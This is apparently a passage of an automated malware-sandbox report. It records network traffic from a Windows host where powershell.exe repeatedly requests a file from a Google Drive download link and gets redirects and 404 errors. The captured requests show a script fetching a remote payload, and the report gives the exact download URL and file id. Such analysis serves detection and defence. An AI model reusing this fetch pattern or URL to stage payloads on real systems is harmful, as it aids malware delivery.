                                  Sep 30, 2024 09:59:45.338329077 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.338375092 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:45.338429928 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.338793039 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.338809967 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:45.982110977 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:45.990789890 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:45.990820885 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358124018 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358654022 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:46.358719110 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358866930 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:46.358870983 CEST44357684142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:46.358978033 CEST57684443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.352560997 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.352618933 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:50.354130983 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.354444027 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:50.354456902 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.012717962 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.012836933 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.013494015 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.013566971 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.017061949 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.017077923 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.017385960 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.018192053 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.063402891 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.397420883 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.399185896 CEST44357685142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:51.399236917 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.406550884 CEST57685443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:51.414117098 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.414166927 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:51.414235115 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.414706945 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.414717913 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:51.415522099 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:51.459398985 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:52.072115898 CEST44357686142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:52.072175980 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:52.072242975 CEST57686443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:55.434231997 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:55.434283018 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:55.434343100 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:55.434727907 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:55.434736967 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.075587034 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.083451033 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:56.083482981 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.455394030 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.456584930 CEST44357687142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:56.456721067 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:56.457335949 CEST57687443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479460955 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479507923 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:00.479852915 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479852915 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:00.479883909 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.116579056 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.118005037 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:01.118040085 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.507814884 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.508526087 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.508588076 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:01.509030104 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525254965 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525310993 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:05.525363922 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525593996 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525599957 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.165488005 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.168590069 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:06.168616056 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.543930054 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.544926882 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.547609091 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:06.547945976 CEST57689443192.168.2.9142.250.186.174

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 30, 2024 09:58:05.120583057 CEST5084553192.168.2.91.1.1.1
                                  Sep 30, 2024 09:58:05.127978086 CEST53508451.1.1.1192.168.2.9
                                  Sep 30, 2024 09:58:06.350341082 CEST5576553192.168.2.91.1.1.1
                                  Sep 30, 2024 09:58:06.357454062 CEST53557651.1.1.1192.168.2.9
                                  Sep 30, 2024 09:58:43.125422001 CEST5364399162.159.36.2192.168.2.9
                                  Sep 30, 2024 09:58:43.676681995 CEST53511901.1.1.1192.168.2.9

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Sep 30, 2024 09:58:05.120583057 CEST192.168.2.91.1.1.10x8482Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                  Sep 30, 2024 09:58:06.350341082 CEST192.168.2.91.1.1.10x3762Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Sep 30, 2024 09:58:00.435671091 CEST1.1.1.1192.168.2.90x2749No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Sep 30, 2024 09:58:00.435671091 CEST1.1.1.1192.168.2.90x2749No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Sep 30, 2024 09:58:05.127978086 CEST1.1.1.1192.168.2.90x8482No error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)false
                                  Sep 30, 2024 09:58:06.357454062 CEST1.1.1.1192.168.2.90x3762No error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • drive.google.com
                                  • drive.usercontent.google.com

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.949707142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:05 UTC215OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:06 UTC1610INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:06 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'nonce-Uf1wfCmVDsAliC1v1wqsZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.949708142.250.186.334437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:07 UTC233OUTGET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.usercontent.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:07 UTC1913INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:07 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: script-src 'nonce-465ryBlG48LPevoEgAOeSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Length: 1652
                                  X-GUploader-UploadID: AD-8ljsiWYEzLr6ofLG4ZMF1opB08n-7bb4fcPcr5gfQfkv8Q7apR4SWAxMAw87dLaD8xo-xRRUhJMqc5Q
                                  Server: UploadServer
                                  Set-Cookie: NID=517=Fwd1-JrhNgK2fQ1sYnKrSyAJOSipDf7bur8VNRR2nqooRmfHzu2mybb2CpYyUCU3RxthKHwVEaBfjEjzZyRUfPI4rv2G-tr65LSHnZ50WHBcIjjL__MRwYzW1_9ROTErH3wUquwj--GDmPhmMQP-Nuk_YALaRfkh_LADyFmBLlBsFXlpHA; expires=Tue, 01-Apr-2025 07:58:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-09-30 07:58:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 6b 32 4f 7a 54 56 77 48 45 41 58 51 63 46 70 6c 55 69 68 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ck2OzTVwHEAXQcFplUiheA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.949709142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:12 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:12 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:12 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-fkNqqgnrnh5MUxM5WaQQgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.949710142.250.186.334437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:13 UTC115OUTGET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1
                                  Host: drive.usercontent.google.com
                                  2024-09-30 07:58:13 UTC1599INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:13 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-IAkb1jTGa-76829Rq6bNpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Length: 1652
                                  X-GUploader-UploadID: AD-8ljt2X2d3s5aCRN26rZwTl8JX2GCulcw5i7dFO9FfqP40lyli4Ai4X8sJKX_IXXZ3TNTLOE6GSoFXtw
                                  Server: UploadServer
                                  Set-Cookie: NID=517=Swf_zx8RlvwN2Z-DKnzCL6Th7r4KGyBckaTRQ4j4hHKJD8Skdkdf5oNJP_fzibaNy5KcwZeC49JzvoFLeBUS1pFhoOYDELm1v6wTkR-7f2Qz2kCidIiR-peuH20Tiev7fimlcJUFpCETwwqhpljN3flIiR_tdyBthPbYmtKIZUx_Z83LpQ; expires=Tue, 01-Apr-2025 07:58:13 GMT; path=/; domain=.google.com; HttpOnly
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-09-30 07:58:13 UTC1599INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 65 44 4d 77 37 48 30 50 2d 67 72 44 44 47 45 42 55 5f 5a 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NeDMw7H0P-grDDGEBU_ZcA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                  2024-09-30 07:58:13 UTC53INData Raw: 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                  Data Ascii: this server. <ins>Thats all we know.</ins></main>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.949713142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:18 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:18 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:18 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-IJj80Ze_DGy3OWZ6jd4tfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.949715142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:23 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:23 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:23 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-plQKEOjcj8r3FXKT-QYw9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.949716142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:28 UTC97OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:58:29 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:28 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-DsiyVmkonxv9meLW15_yrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.949718142.250.186.1744437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2024-09-30 07:58:33 UTC121OUTGET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:34 UTC1319INHTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:33 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-BCvogfyFpRr9nsbzdDfP8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
